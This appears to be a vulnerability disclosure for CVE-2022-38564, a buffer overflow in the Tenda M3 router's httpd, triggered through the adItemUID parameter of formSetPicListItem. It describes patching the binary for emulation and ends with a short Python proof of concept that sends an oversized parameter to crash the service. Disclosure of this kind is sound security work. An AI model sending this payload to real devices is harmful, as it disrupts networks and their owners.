Headline
CVE-2022-38564: Vuln/Tenda M3/formSetPicListItem at main · xxy1126/Vuln
Tenda M3 V1.0.0.12(4856) was discovered to contain a buffer overflow vulnerability in the function formSetPicListItem. This vulnerability allows attackers to cause a Denial of Service (DoS) via the adItemUID parameter.
Tenda M3 contains Buffer Overflow Vulnerability****overview
type: buffer overflow vulnerability
supplier: Tenda https://www.tenda.com
product: TendaM3 https://www.tenda.com.cn/product/M3.html
firmware download: https://www.tenda.com.cn/download/detail-3133.html
affect version: TendaM3 v1.0.0.12(4856)
Description****1. Vulnerability Details
the httpd in directory /bin has a buffer overflow. The vunlerability is in fucntion formSetPicListItem
In this function, it copies POST parameter adItemUID to buffer in .bss
If v21 is too long, it will causes dos(deny of service)
2. Recurring loopholes and POC
use qemu-arm-static to run the httpd, we need to patch it before run.
- in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
- The R7WebsSecurityHandler function is used for permission control, and I’ve modified it to access URLs that can only be accessed after login
poc of DOS(deny of service)
import requests
data = { "adItemUID": "a"*0x2000 } cookies = { "user": “admin” } res = requests.post("http://127.0.0.1/goform/setPicListItem", data=data, cookies=cookies) print(res.content)